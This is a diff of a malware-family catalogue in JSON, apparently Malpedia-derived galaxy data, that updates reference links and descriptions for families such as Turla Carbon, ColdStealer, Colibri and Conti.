- "https://www.govcert.ch/downloads/whitepapers/Report_Ruag-Espionage-Case.pdf",
- "https://www.circl.lu/pub/tr-25/",
- "https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/",
- "https://securelist.com/analysis/publications/65545/the-epic-turla-operation/",
- "https://www.youtube.com/watch?v=FttiysUZmDw",
"https://github.com/hfiref0x/TDL",
+ "https://blog.gdatasoftware.com/2015/01/23926-analysis-of-project-cobra",
+ "https://www.melani.admin.ch/dam/melani/de/dokumente/2016/technical%20report%20ruag.pdf.download.pdf/Report_Ruag-Espionage-Case.pdf",
+ "https://www.secureworks.com/research/threat-profiles/iron-hunter",
+ "https://www.circl.lu/pub/tr-25/",
+ "https://securelist.com/shedding-skin-turlas-fresh-faces/88069/",
+ "https://www-west.symantec.com/content/dam/symantec/docs/security-center/white-papers/waterbug-attack-group-16-en.pdf",
+ "https://securelist.com/analysis/publications/65545/the-epic-turla-operation/",
"https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
- "https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity"
+ "https://github.com/sisoma2/malware_analysis/tree/master/turla_carbon",
+ "https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity",
+ "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-129a",
+ "https://www.govcert.ch/downloads/whitepapers/Report_Ruag-Espionage-Case.pdf",
+ "https://docs.broadcom.com/doc/waterbug-attack-group",
+ "https://www.youtube.com/watch?v=FttiysUZmDw",
+ "https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/"
],
"synonyms": [
"Carbon"
@@ -17780,26 +18890,17 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.coinminer",
- "https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer/",
- "https://blog.malwarebytes.com/threat-analysis/2018/01/a-coin-miner-with-a-heavens-gate/",
- "https://blog.malwarebytes.com/threat-analysis/2018/01/a-coin-miner-with-a-heavens-gate/amp/",
- "https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html",
+ "https://secrary.com/ReversingMalware/CoinMiner/",
"https://www.triskelelabs.com/investigating-monero-coin-miner",
+ "https://blog.malwarebytes.com/threat-analysis/2018/01/a-coin-miner-with-a-heavens-gate/",
+ "https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html",
+ "https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer/",
"https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/",
- "https://secrary.com/ReversingMalware/CoinMiner/"
+ "https://blog.malwarebytes.com/threat-analysis/2018/01/a-coin-miner-with-a-heavens-gate/amp/"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "89bd2020-2594-45c4-8957-522c0ac41370",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "333e2e87-b9b0-4e2e-9ed9-7259c55a93db",
"value": "Coinminer"
},
@@ -17835,11 +18936,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.coldseal",
+ "http://web.archive.org/web/20181007211751/https://myonlinesecurity.co.uk/return-of-fake-ups-cannot-deliver-malspam-with-an-updated-nemucod-ransomware-and-kovter-payload/",
"https://web.archive.org/web/20190331091056/https://myonlinesecurity.co.uk/fake-cdc-flu-pandemic-warning-delivers-gandcrab-5-2-ransomware/",
- "https://www.xylibox.com/2012/01/coldeal-situation-is-under-control.html",
- "https://www.xylibox.com/2012/01/cracking-coldeal-541-fwb.html",
"https://www.youtube.com/watch?v=242Tn0IL2jE",
- "http://web.archive.org/web/20181007211751/https://myonlinesecurity.co.uk/return-of-fake-ups-cannot-deliver-malspam-with-an-updated-nemucod-ransomware-and-kovter-payload/"
+ "https://www.xylibox.com/2012/01/cracking-coldeal-541-fwb.html",
+ "https://www.xylibox.com/2012/01/coldeal-situation-is-under-control.html"
],
"synonyms": [
"ColdSeal"
@@ -17850,12 +18951,13 @@
"value": "Cold$eal"
},
{
- "description": "",
+ "description": "ColdStealer is a relatively new malicious program that was discovered in 2022. Like many other stealers its main purpose is to steal credentials and information from web browsers, in addition to stealing cryptocurrency wallets, FTP credentials, various files and information about the system such as OS version, system language, processor type and clipboard data. When the infostealer collects information that will be stolen, it saves the information in the ZIP form instead of files in the memory. Doing so will allow the malware to bypass detection as there are no traces of files and execution. The only known method of delivering stolen information to cybercriminals is by sending a ZIP archive to the hardcoded command and control (C2) server.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.coldstealer",
"https://asec.ahnlab.com/ko/31703/",
- "https://asec.ahnlab.com/en/32090/"
+ "https://asec.ahnlab.com/en/32090/",
+ "https://securelist.com/nullmixer-oodles-of-trojans-in-a-single-dropper/107498/"
],
"synonyms": [],
"type": []
@@ -17868,10 +18970,12 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.colibri",
+ "https://github.com/Casperinous/colibri_loader",
"https://cloudsek.com/in-depth-technical-analysis-of-colibri-loader-malware/",
- "https://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/",
"https://fr3d.hk/blog/colibri-loader-back-to-basics",
- "https://github.com/Casperinous/colibri_loader"
+ "https://go.recordedfuture.com/hubfs/reports/cta-2022-0919.pdf",
+ "https://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/",
+ "https://www.bitsight.com/blog/unpacking-colibri-loader-russian-apt-linked-campaign"
],
"synonyms": [],
"type": []
@@ -17884,6 +18988,7 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.collectorgoomba",
+ "https://blog.bushidotoken.net/2022/11/detecting-and-fingerprinting.html",
"https://www.vmray.com/cyber-security-blog/cutting-off-command-and-control-infrastructure-collectorgoomba-threat-bulletin/"
],
"synonyms": [
@@ -17899,8 +19004,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.colony",
- "https://pastebin.com/GtjBXDmz",
"https://twitter.com/anyrun_app/status/976385355384590337",
+ "https://pastebin.com/GtjBXDmz",
"https://secrary.com/ReversingMalware/Colony_Bandios/"
],
"synonyms": [
@@ -17935,15 +19040,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "fa38b79c-9774-45a0-831c-24c6c8d39a22",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "2b71a966-da08-4467-a785-cb6abf2fa65e",
"value": "Combos"
},
@@ -17953,10 +19049,10 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.comebacker",
"https://norfolkinfosec.com/dprk-targeting-researchers-ii-sys-payload-and-registry-hunting/",
+ "https://www.anquanke.com/post/id/230161",
"https://www.microsoft.com/security/blog/2021/01/28/zinc-attacks-against-security-researchers/",
- "https://www.comae.com/posts/pandorabox-north-koreans-target-security-researchers/",
"https://norfolkinfosec.com/dprk-malware-targeting-security-researchers/",
- "https://www.anquanke.com/post/id/230161"
+ "https://www.comae.com/posts/pandorabox-north-koreans-target-security-researchers/"
],
"synonyms": [],
"type": []
@@ -17991,13 +19087,26 @@
"uuid": "7726de54-95cc-4783-b26f-79882f0f6cba",
"value": "ComLook"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.common_magic",
+ "https://securelist.com/bad-magic-apt/109087/?s=31"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "600b553b-660b-4bbd-9c5d-4e91af9d276a",
+ "value": "CommonMagic"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.comodosec",
- "https://techhelplist.com/down/malware-ransom-comodosec-mrcr1.txt",
- "https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf"
+ "https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf",
+ "https://techhelplist.com/down/malware-ransom-comodosec-mrcr1.txt"
],
"synonyms": [],
"type": []
@@ -18010,26 +19119,17 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.compfun",
- "https://www.gdatasoftware.com/blog/2014/10/23941-com-object-hijacking-the-discreet-way-of-persistence",
- "https://securelist.com/compfun-successor-reductor/93633/",
"https://securelist.com/it-threat-evolution-q2-2020/98230",
+ "https://www.gdatasoftware.com/blog/2014/10/23941-com-object-hijacking-the-discreet-way-of-persistence",
+ "https://securelist.com/apt-trends-report-q2-2019/91897/",
"https://securelist.com/compfun-http-status-based-trojan/96874/",
- "https://securelist.com/apt-trends-report-q2-2019/91897/"
+ "https://securelist.com/compfun-successor-reductor/93633/"
],
"synonyms": [
"Reductor RAT"
],
"type": []
},
- "related": [
- {
- "dest-uuid": "b2c2d42b-a6a3-4ab0-a013-eb1c7461aca9",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "541d5642-0648-4b5a-97b9-81110f273771",
"value": "COMpfun"
},
@@ -18038,10 +19138,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.computrace",
+ "https://www.lastline.com/labsblog/apt28-rollercoaster-the-lowdown-on-hijacked-lojack/",
"https://bartblaze.blogspot.de/2014/11/thoughts-on-absolute-computrace.html",
"https://asert.arbornetworks.com/lojack-becomes-a-double-agent/",
- "https://www.secureworks.com/research/threat-profiles/iron-twilight",
- "https://www.lastline.com/labsblog/apt28-rollercoaster-the-lowdown-on-hijacked-lojack/"
+ "https://www.secureworks.com/research/threat-profiles/iron-twilight"
],
"synonyms": [
"lojack"
@@ -18083,15 +19183,15 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.conficker",
- "http://www.csl.sri.com/users/vinod/papers/Conficker/addendumC/index.html",
- "https://github.com/itaymigdal/malware-analysis-writeups/blob/main/Conficker/Conficker.md",
- "https://www.kaspersky.com/about/press-releases/2009_kaspersky-lab-analyses-new-version-of-kido--conficker",
- "https://www.minitool.com/backup-tips/conficker-worm.html",
- "https://www.sophos.com/fr-fr/medialibrary/PDFs/marketing%20material/confickeranalysis.pdf",
- "https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf",
- "http://contagiodump.blogspot.com/2009/05/win32conficker.html",
"https://github.com/tillmannw/cnfckr",
- "https://redcanary.com/blog/intelligence-insights-january-2022/"
+ "https://github.com/itaymigdal/malware-analysis-writeups/blob/main/Conficker/Conficker.md",
+ "https://www.minitool.com/backup-tips/conficker-worm.html",
+ "http://contagiodump.blogspot.com/2009/05/win32conficker.html",
+ "https://redcanary.com/blog/intelligence-insights-january-2022/",
+ "http://www.csl.sri.com/users/vinod/papers/Conficker/addendumC/index.html",
+ "https://www.sophos.com/fr-fr/medialibrary/PDFs/marketing%20material/confickeranalysis.pdf",
+ "https://www.kaspersky.com/about/press-releases/2009_kaspersky-lab-analyses-new-version-of-kido--conficker",
+ "https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf"
],
"synonyms": [
"Kido",
@@ -18108,10 +19208,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.confucius",
- "https://www.uptycs.com/blog/confucius-apt-deploys-warzone-rat",
- "https://www.trendmicro.com/en_us/research/21/h/confucius-uses-pegasus-spyware-related-lures-to-target-pakistani.html",
"https://researchcenter.paloaltonetworks.com/2016/09/unit42-confucius-says-malware-families-get-further-by-abusing-legitimate-websites/",
- "https://researchcenter.paloaltonetworks.com/2017/11/unit42-recent-inpage-exploits-lead-multiple-malware-families/"
+ "https://www.uptycs.com/blog/confucius-apt-deploys-warzone-rat",
+ "https://researchcenter.paloaltonetworks.com/2017/11/unit42-recent-inpage-exploits-lead-multiple-malware-families/",
+ "https://www.trendmicro.com/en_us/research/21/h/confucius-uses-pegasus-spyware-related-lures-to-target-pakistani.html"
],
"synonyms": [],
"type": []
@@ -18124,188 +19224,197 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.conti",
- "https://github.com/TheParmak/conti-leaks-englished",
- "https://krebsonsecurity.com/2021/10/conti-ransom-gang-starts-selling-access-to-victims/",
- "https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti",
- "https://www.sekoia.io/en/an-insider-insights-into-conti-operations-part-two/",
- "https://nakedsecurity.sophos.com/2021/08/06/conti-ransomware-affiliate-goes-rogue-leaks-company-data/",
- "https://www.darktrace.com/en/blog/the-double-extortion-business-conti-ransomware-gang-finds-new-avenues-of-negotiation/",
- "https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html",
- "https://thedfirreport.com/2021/05/12/conti-ransomware/",
- "https://www.eldiario.es/tecnologia/capos-cibercrimen-avisan-contratacaran-si-hackea-rusia_1_8795458.html",
- "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/",
- "https://www.dragos.com/blog/industry-news/suspected-conti-ransomware-activity-in-the-auto-manufacturing-sector/",
- "https://www.zscaler.com/blogs/security-research/conti-ransomware-attacks-persist-updated-version-despite-leaks",
- "https://www.elliptic.co/blog/conti-ransomware-nets-at-least-25.5-million-in-four-months",
- "https://www.cybereason.com/blog/cybereason-vs.-conti-ransomware",
- "https://blog.talosintelligence.com/2021/09/Conti-leak-translation.html",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/log4j-vulnerabilities-attacks",
- "https://www.esentire.com/blog/analysis-of-leaked-conti-intrusion-procedures-by-esentires-threat-response-unit-tru",
- "https://therecord.media/disgruntled-ransomware-affiliate-leaks-the-conti-gangs-technical-manuals/",
- "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html",
- "https://news.sophos.com/en-us/2021/02/16/conti-ransomware-attack-day-by-day/",
- "https://www.crowdstrike.com/blog/how-to-defend-against-conti-darkside-revil-and-other-ransomware/",
- "https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/",
- "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound",
- "https://cti-league.com/wp-content/uploads/2021/02/CTI-League-Darknet-Report-2021.pdf",
- "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
- "https://threatpost.com/conti-ransomware-decryptor-trickbot-source-code-leaked/178727/",
- "https://research.checkpoint.com/2022/leaks-of-conti-ransomware-group-paint-picture-of-a-surprisingly-normal-tech-start-up-sort-of/",
- "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/",
- "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
- "https://www.dragos.com/blog/industry-news/dragos-ics-ot-ransomware-analysis-q4-2021/",
- "https://www.mbsd.jp/research/20210413/conti-ransomware/",
- "https://www.sekoia.io/en/an-insider-insights-into-conti-operations-part-one",
- "https://www.bleepingcomputer.com/news/security/conti-ransomware-source-code-leaked-by-ukrainian-researcher/",
- "https://news.sophos.com/en-us/2022/02/28/conti-and-karma-actors-attack-healthcare-provider-at-same-time-through-proxyshell-exploits/?cmp=30728",
- "https://www.trmlabs.com/post/analysis-corroborates-suspected-ties-between-conti-and-ryuk-ransomware-groups-and-wizard-spider",
- "https://blog.talosintelligence.com/2022/05/conti-and-hive-ransomware-operations.html",
"https://securelist.com/luna-black-basta-ransomware/106950",
- "https://twitter.com/TheDFIRReport/status/1498642512935800833",
- "https://www.esentire.com/blog/conti-affiliate-exposed-new-domain-names-ip-addresses-and-email-addresses-uncovered-by-esentire",
- "https://www.cynet.com/attack-techniques-hands-on/shelob-moonlight-spinning-a-larger-web/",
- "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-group-targets-esxi-hypervisors-with-its-linux-variant.html",
- "https://www.prodaft.com/m/reports/WizardSpider_TLPWHITE_v.1.4.pdf",
- "https://www.prevailion.com/what-wicked-webs-we-unweave/",
- "https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
- "https://intel471.com/blog/conti-vs-monti-a-reinvention-or-just-a-simple-rebranding",
- "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v",
- "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-as-a-service-enabler-of-widespread-attacks",
+ "https://marcoramilli.com/2021/11/07/conti-ransomware-cheat-sheet/",
+ "https://www.unh4ck.com/detection-engineering-and-threat-hunting/lateral-movement/detecting-conti-cobaltstrike-lateral-movement-techniques-part-2",
"https://medium.com/@arnozobec/analyzing-conti-leaks-without-speaking-russian-only-methodology-f5aecc594d1b",
- "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
- "https://0xthreatintel.medium.com/reversing-conti-ransomware-bfce15019e74",
- "https://medium.com/cycraft/the-road-to-ransomware-resilience-c1ca37036efd",
+ "https://us-cert.cisa.gov/ncas/alerts/aa21-265a",
+ "https://www.esentire.com/blog/analysis-of-leaked-conti-intrusion-procedures-by-esentires-threat-response-unit-tru",
+ "https://www.advintel.io/post/24-hours-from-log4shell-to-local-admin-deep-dive-into-conti-gang-attack-on-fortune-500-dfir",
+ "https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/",
+ "https://krebsonsecurity.com/2021/10/conti-ransom-gang-starts-selling-access-to-victims/",
+ "https://research.nccgroup.com/2022/04/29/adventures-in-the-land-of-bumblebee-a-new-malicious-loader/",
+ "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/",
+ "https://research.checkpoint.com/2022/leaks-of-conti-ransomware-group-paint-picture-of-a-surprisingly-normal-tech-start-up-sort-of/",
+ "https://threatpost.com/conti-ransomware-decryptor-trickbot-source-code-leaked/178727/",
+ "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-conti",
+ "https://blog.qualys.com/vulnerabilities-threat-research/2021/11/18/conti-ransomware",
+ "https://cocomelonc.github.io/investigation/2022/04/11/malw-inv-conti-2.html",
+ "https://www.coveware.com/blog/2022/1/26/ransomware-as-a-service-innovation-curve",
+ "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/",
+ "https://www.fortinet.com/blog/threat-research/diavol-new-ransomware-used-by-wizard-spider",
+ "https://www.silentpush.com/blog/consequences-the-conti-leaks-and-future-problems",
+ "https://www.cyberscoop.com/ransomware-gang-conti-bounced-back/",
+ "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound",
+ "https://www.esentire.com/blog/conti-affiliate-exposed-new-domain-names-ip-addresses-and-email-addresses-uncovered-by-esentire",
+ "https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-annex-download.pdf",
"https://attackiq.com/2022/06/15/attack-graph-emulating-the-conti-ransomware-teams-behaviors/",
+ "https://lifars.com/wp-content/uploads/2021/10/ContiRansomware_Whitepaper.pdf",
+ "https://www.clearskysec.com/wp-content/uploads/2021/02/Conti-Ransomware.pdf",
+ "https://medium.com/walmartglobaltech/from-royal-with-love-88fa05ff7f65",
+ "https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox",
+ "https://www.eldiario.es/tecnologia/capos-cibercrimen-avisan-contratacaran-si-hackea-rusia_1_8795458.html",
+ "https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/",
+ "https://www.advintel.io/post/ransomware-advisory-log4shell-exploitation-for-initial-access-lateral-movement",
+ "https://cocomelonc.github.io/malware/2023/01/04/malware-tricks-26.html",
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-as-a-service-enabler-of-widespread-attacks",
+ "https://www.dragos.com/blog/industry-news/suspected-conti-ransomware-activity-in-the-auto-manufacturing-sector/",
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-double-extortion-and-beyond-revil-clop-and-conti",
+ "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/787/original/ransomware-chats.pdf",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2022-0802.pdf",
+ "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
+ "https://www.secureworks.com/blog/gold-ulrick-leaks-reveal-organizational-structure-and-relationships",
+ "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti",
+ "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://cocomelonc.github.io/investigation/2022/03/27/malw-inv-conti-1.html",
+ "https://blog.bushidotoken.net/2022/04/lessons-from-conti-leaks.html",
+ "https://cocomelonc.github.io/tutorial/2022/04/02/malware-injection-18.html",
+ "https://www.ironnet.com/blog/ransomware-graphic-blog",
+ "https://www.dragos.com/blog/industry-news/dragos-ics-ot-ransomware-analysis-q4-2021/",
+ "https://thedfirreport.com/2021/09/13/bazarloader-to-conti-ransomware-in-32-hours/",
+ "https://securityaffairs.com/141666/cyber-crime/lockbit-green-ransomware-variant.html",
+ "https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/",
+ "https://www.trmlabs.com/post/analysis-corroborates-suspected-ties-between-conti-and-ryuk-ransomware-groups-and-wizard-spider",
+ "https://github.com/whichbuffer/Conti-Ransomware-IOC",
+ "https://arcticwolf.com/resources/blog/karakurt-web",
+ "https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/",
+ "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
+ "https://nakedsecurity.sophos.com/2021/08/06/conti-ransomware-affiliate-goes-rogue-leaks-company-data/",
+ "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-group-targets-esxi-hypervisors-with-its-linux-variant.html",
+ "https://www.ncsc.gov.ie/pdfs/HSE_Conti_140521_UPDATE.pdf",
+ "https://www.cynet.com/attack-techniques-hands-on/shelob-moonlight-spinning-a-larger-web/",
+ "https://documents.trendmicro.com/assets/pdf/datasheet-ransomware-in-Q1-2022.pdf",
+ "https://www.connectwise.com/resources/conti-profile",
+ "https://unit42.paloaltonetworks.com/conti-ransomware-gang/",
+ "https://www.bleepingcomputer.com/news/security/karakurt-revealed-as-data-extortion-arm-of-conti-cybercrime-syndicate/",
"http://chuongdong.com/reverse%20engineering/2020/12/15/ContiRansomware/",
"https://therecord.media/conti-leaks-the-panama-papers-of-ransomware/",
- "https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/",
- "https://cluster25.io/2022/03/02/contis-source-code-deep-dive-into/",
- "https://www.threatstop.com/blog/first-conti-then-hive-costa-rica-gets-hit-with-ransomware-again",
- "https://share.vx-underground.org/Conti/",
- "https://www.crowdstrike.com/blog/wizard-spider-adversary-update/",
- "https://cocomelonc.github.io/tutorial/2022/04/02/malware-injection-18.html",
- "https://news.sophos.com/en-us/2022/02/22/cyberthreats-during-russian-ukrainian-tensions-what-can-we-learn-from-history-to-be-prepared/",
- "https://www.youtube.com/watch?v=hmaWy9QIC7c",
- "https://therecord.media/conti-ransomware-gang-chats-leaked-by-pro-ukraine-member/",
- "https://threatpost.com/conti-ransomware-v-3-including-decryptor-leaked/179006/",
- "https://www.bleepingcomputer.com/news/security/microsoft-exchange-servers-hacked-to-deploy-hive-ransomware/",
- "https://www.advanced-intel.com/post/secret-backdoor-behind-conti-ransomware-operation-introducing-atera-agent",
- "https://www.cyberscoop.com/ransomware-gang-conti-bounced-back/",
"https://intel471.com/blog/conti-leaks-cybercrime-fire-team",
+ "https://www.cybereason.com/blog/cybereason-vs.-conti-ransomware",
"https://news.sophos.com/en-us/2021/02/16/conti-ransomware-evasive-by-nature/",
- "https://www.truesec.com/hub/blog/proxyshell-qbot-and-conti-ransomware-combined-in-a-series-of-cyber-attacks",
- "https://krebsonsecurity.com/2022/03/conti-ransomware-group-diaries-part-ii-the-office/",
- "https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/",
- "https://assets.sentinelone.com/ransomware-enterprise/conti-ransomware-unpacked",
- "https://intel471.com/blog/shipping-companies-ransomware-credentials",
- "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
- "https://www.cybereason.com/blog/threat-analysis-report-from-shatak-emails-to-the-conti-ransomware",
- "https://www.unh4ck.com/detection-engineering-and-threat-hunting/lateral-movement/detecting-conti-cobaltstrike-lateral-movement-techniques-part-2",
- "https://www.youtube.com/watch?v=uORuVVQzZ0A",
- "https://blog.reversinglabs.com/blog/conversinglabs-ep-2-conti-pivots-as-ransomware-as-a-service-struggles",
- "https://cybersecurity.att.com/blogs/security-essentials/stories-from-the-soc-powershell-proxyshell-conti-ttps-oh-my",
- "https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf",
- "https://yoroi.company/research/conti-ransomware-source-code-a-well-designed-cots-ransomware/",
- "https://www.bleepingcomputer.com/news/security/karakurt-revealed-as-data-extortion-arm-of-conti-cybercrime-syndicate/",
- "https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf",
- "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/the-sound-of-malware.html",
- "https://arcticwolf.com/resources/blog/conti-ransomware-leak-analyzed",
- "https://research.nccgroup.com/2022/04/29/adventures-in-the-land-of-bumblebee-a-new-malicious-loader/",
- "https://twitter.com/AltShiftPrtScn/status/1423188974298861571",
- "https://www.redhotcyber.com/post/il-ransomware-conti-si-schiera-a-favore-della-russia",
- "https://twitter.com/AltShiftPrtScn/status/1350755169965924352",
- "https://www.youtube.com/watch?v=cYx7sQRbjGA",
- "https://www.mbsd.jp/2022/03/08/assets/images/MBSD_Summary_of_ContiLeaks_Rev3.pdf",
- "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
- "https://research.nccgroup.com/2022/03/31/conti-nuation-methods-and-techniques-observed-in-operations-post-the-leaks/",
- "https://www.silentpush.com/blog/consequences-the-conti-leaks-and-future-problems",
- "https://github.com/whichbuffer/Conti-Ransomware-IOC",
- "https://www.bleepingcomputer.com/news/security/conti-ransomwares-internal-chats-leaked-after-siding-with-russia/",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
- "https://twitter.com/AltShiftPrtScn/status/1417849181012647938",
- "https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/",
- "https://marcoramilli.com/2021/11/07/conti-ransomware-cheat-sheet/",
- "https://www.fortinet.com/blog/threat-research/diavol-new-ransomware-used-by-wizard-spider",
- "https://www.bleepingcomputer.com/news/security/hhs-conti-ransomware-encrypted-80-percent-of-irelands-hse-it-systems/",
- "https://www.advintel.io/post/discontinued-the-end-of-conti-s-brand-marks-new-chapter-for-cybercrime-landscape",
- "https://www.bankinfosecurity.com/cybercrime-moves-conti-ransomware-absorbs-trickbot-malware-a-18573",
- "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
- "https://blogs.blackberry.com/en/2022/09/the-curious-case-of-monti-ransomware-a-real-world-doppelganger",
- "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/",
- "https://redcanary.com/blog/intelligence-insights-november-2021/",
- "https://securelist.com/modern-ransomware-groups-ttps/106824/",
- "https://blog.qualys.com/vulnerabilities-threat-research/2021/11/18/conti-ransomware",
- "https://www.bleepingcomputer.com/news/security/taiwanese-apple-and-tesla-contractor-hit-by-conti-ransomware/",
- "https://www.hse.ie/eng/services/publications/conti-cyber-attack-on-the-hse-full-report.pdf",
- "https://thehackernews.com/2022/05/malware-analysis-trickbot.html",
- "https://www.ic3.gov/Media/News/2021/210521.pdf",
- "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/787/original/ransomware-chats.pdf",
- "https://www.prodaft.com/m/reports/Conti_TLPWHITE_v1.6_WVcSEtc.pdf",
- "https://www.advintel.io/post/24-hours-from-log4shell-to-local-admin-deep-dive-into-conti-gang-attack-on-fortune-500-dfir",
- "https://securityandtechnology.org/wp-content/uploads/2021/04/IST-Ransomware-Task-Force_Final_Report.pdf",
- "https://us-cert.cisa.gov/ncas/alerts/aa21-265a",
